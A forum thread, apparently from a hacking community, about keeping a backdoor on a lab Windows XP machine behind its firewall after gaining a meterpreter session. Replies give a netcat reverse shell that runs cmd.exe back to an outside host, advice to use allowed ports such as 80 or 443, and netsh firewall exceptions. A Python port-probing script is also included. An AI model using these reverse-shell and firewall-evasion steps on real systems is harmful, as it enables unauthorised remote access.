Evade Firewall On Compromised Machine.


c0r

I'm trying to create a backdoor on a virtual XP SP2 machine with the firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also I tried to install netcat and open a port using the netsh command in Windows.

But the port doesn't open.

Any other ideas?

c

PS: this is all practised in my virtual lab.

Hi C0R,

In order to create a reverse shell with NetCat you will need to do the following:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e cmd.exe yourhost 3333

Try the above; if it doesn't work, let me know.

Regards,

Infiltrator

Are you trying port 455 (the one that tutorial you posted used as an example) or some other port?

My first instinct is that the Win firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice.

I have the OpenBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Win version is the same or not.

I tried this howto: Persistent netcat backdoor

but the firewall doesn't allow the connection!

c

That's kind of interesting, 'cause when I created a reverse shell with netcat on my VMs, I was able to get a reverse shell even with the firewall turned on.

Maybe you should try using the TCP ports mentioned (80, 443).

Use netsh from the CLI. A quick Google produced:

http://www.windowsnetworking.com/articles_...s-Firewall.html

None... that's the weird part...

I'm trying it out on a newly installed XP SP2 now.

Okay... I'm trying this on a fresh XP SP2 version.

I don't get any errors; the firewall adds the exceptions without any problem.

But when I try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

On the Windows machine I see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time... then it times out.

Any ideas?

c

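The output above mixes three different things: an inverse DNS lookup that timed out, a TCP handshake that actually completed (the "open" line), and an established connection that the NetBIOS session service then dropped because netcat never sent a session request. A small probe that separates "no reply at all" (filtered), "RST" (closed) and "handshake completed" (open), and then checks whether the service talks first, makes it clear whether the firewall or the service is the problem. The following Python script is an added example, not code from this thread or from any poster; it assumes nothing beyond the standard library, and its self-test fixture is a constructed listener on 127.0.0.1.

```python
import socket
import sys


def probe_port(host, port, timeout=3.0):
    """Classify what a TCP connect() to host:port tells you.

    'open'     - handshake completed: the firewall passed the SYN and a service answered
    'closed'   - RST came back: the host is reachable but nothing is listening there
    'filtered' - no reply before the timeout: a firewall is most likely dropping packets
    Anything else (host unreachable, name resolution failure) is 'error: <reason>'.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError as exc:
        return f"error: {exc.strerror or exc}"
    finally:
        s.close()


def service_sends_banner(host, port, timeout=2.0):
    """After a successful connect, see whether the service speaks first.

    Returns the banner bytes, b'' if the peer closed without sending anything,
    or None if the peer stayed silent for `timeout` seconds. A silent peer that
    later drops the connection is what you get on 139/netbios-ssn, which waits
    for the client to send a session request: the firewall let the connection
    through, and the silence is the service's behaviour, not a block.
    Raises OSError if the connect itself fails; call probe_port() first.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return s.recv(256)
    except socket.timeout:
        return None
    finally:
        s.close()


def open_local_listener():
    """Constructed test fixture: listen on an ephemeral 127.0.0.1 port.

    Returns (socket, port). The kernel completes handshakes into the backlog,
    so probe_port() reports 'open' even though nothing ever calls accept().
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        # usage: probe.py <host> <port> [port ...]
        host = sys.argv[1]
        for p in sys.argv[2:]:
            state = probe_port(host, int(p))
            banner = service_sends_banner(host, int(p)) if state == "open" else None
            print(f"{host}:{p} -> {state}"
                  + (f", banner={banner!r}" if state == "open" else ""))
    else:
        # No arguments: demonstrate against the constructed local listener.
        srv, port = open_local_listener()
        print(f"listening port {port}: {probe_port('127.0.0.1', port)}")
        print(f"silent service banner: {service_sends_banner('127.0.0.1', port, 0.5)!r}")
        srv.close()
        print(f"same port after close: {probe_port('127.0.0.1', port)}")
```

Run it as `python probe.py 192.168.1.102 139 445 3333` against the lab VM: a "filtered" result means the Windows firewall (or something in between) is dropping the SYN and the netsh exception did not take effect; "closed" means the packet reached the host but no listener was bound; "open" followed by a silent banner means the firewall is not the problem and the listener simply expects the client to talk first.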
What you need to ensure is that you have one shell listening for incoming connections and the other shell making the outbound connection.

So on the computer that you wish to turn off the monitor, it should be making the connection out. And on the computer where you are going to remotely control it from, have it set to listen.

If all else fails, watch this video
